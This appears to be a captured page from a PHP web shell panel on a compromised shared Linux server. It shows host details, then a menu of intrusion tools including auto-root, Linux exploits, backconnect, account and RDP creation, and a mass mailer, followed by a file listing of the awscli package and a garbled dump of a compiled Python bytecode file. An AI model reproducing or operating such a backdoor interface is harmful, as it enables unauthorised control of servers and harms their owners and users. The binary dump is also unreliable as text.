Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
awscli /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
828
B
-rw-r--r--
__main__.cpython-310.pyc
258
B
-rw-r--r--
alias.cpython-310.pyc
9.08
KB
-rw-r--r--
argparser.cpython-310.pyc
6.08
KB
-rw-r--r--
argprocess.cpython-310.pyc
15.07
KB
-rw-r--r--
arguments.cpython-310.pyc
15.61
KB
-rw-r--r--
clidocs.cpython-310.pyc
23.19
KB
-rw-r--r--
clidriver.cpython-310.pyc
18.64
KB
-rw-r--r--
commands.cpython-310.pyc
1.89
KB
-rw-r--r--
compat.cpython-310.pyc
12.12
KB
-rw-r--r--
completer.cpython-310.pyc
4.06
KB
-rw-r--r--
errorhandler.cpython-310.pyc
2.46
KB
-rw-r--r--
formatter.cpython-310.pyc
7.38
KB
-rw-r--r--
handlers.cpython-310.pyc
7.21
KB
-rw-r--r--
help.cpython-310.pyc
13.29
KB
-rw-r--r--
paramfile.cpython-310.pyc
8.15
KB
-rw-r--r--
plugin.cpython-310.pyc
1.68
KB
-rw-r--r--
schema.cpython-310.pyc
5.35
KB
-rw-r--r--
shorthand.cpython-310.pyc
13.28
KB
-rw-r--r--
table.cpython-310.pyc
12.13
KB
-rw-r--r--
testutils.cpython-310.pyc
31.32
KB
-rw-r--r--
text.cpython-310.pyc
2.88
KB
-rw-r--r--
topictags.cpython-310.pyc
9.45
KB
-rw-r--r--
utils.cpython-310.pyc
8.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : topictags.cpython-310.pyc
o @&�al1 � @ s, d dl Z d dlZd dlZG dd� de�ZdS )� Nc @ s e Zd ZdZg d�Zej�ej�ej� e ��d�Zej�ed�Zdeefdd�Z edd � �Zejd d � �Zedd� �Zejd d� �Zedd� �Zdd� Zdd� Zdd� Zdd� Zdd� Zdd� Zdd� Zdd� Zd d!� Zd"d#� Zd*d$d%�Zd*d&d'�Zd(d)� ZdS )+� TopicTagDBa� This class acts like a database for the tags of all available topics. A tag is an element in a topic reStructured text file that contains information about a topic. Information can range from titles to even related CLI commands. Here are all of the currently supported tags: Tag Meaning Required? --- ------- --------- :title: The title of the topic Yes :description: Sentence description of topic Yes :category: Category topic falls under Yes :related topic: A related topic No :related command: A related command No To see examples of how to specify tags, look in the directory awscli/topics. Note that tags can have multiple values by delimiting values with commas. All tags must be on their own line in the file. This class can load a JSON index represeting all topics and their tags, scan all of the topics and store the values of their tags, retrieve the tag value for a particular topic, query for all the topics with a specific tag and/or value, and save the loaded data back out to a JSON index. The structure of the database can be viewed as a python dictionary: {'topic-name-1': { 'title': ['My First Topic Title'], 'description': ['This describes my first topic'], 'category': ['General Topics', 'S3'], 'related command': ['aws s3'], 'related topic': ['topic-name-2'] }, 'topic-name-2': { ..... } The keys of the dictionary are the CLI command names of the topics. These names are based off the name of the reStructed text file that corresponds to the topic. The value of these keys are dictionaries of tags, where the tags are keys and their value is a list of values for that tag. Note that all tag values for a specific tag of a specific topic are unique. )�category�description�titlez related topiczrelated command�topicsztopic-tags.jsonNc C s&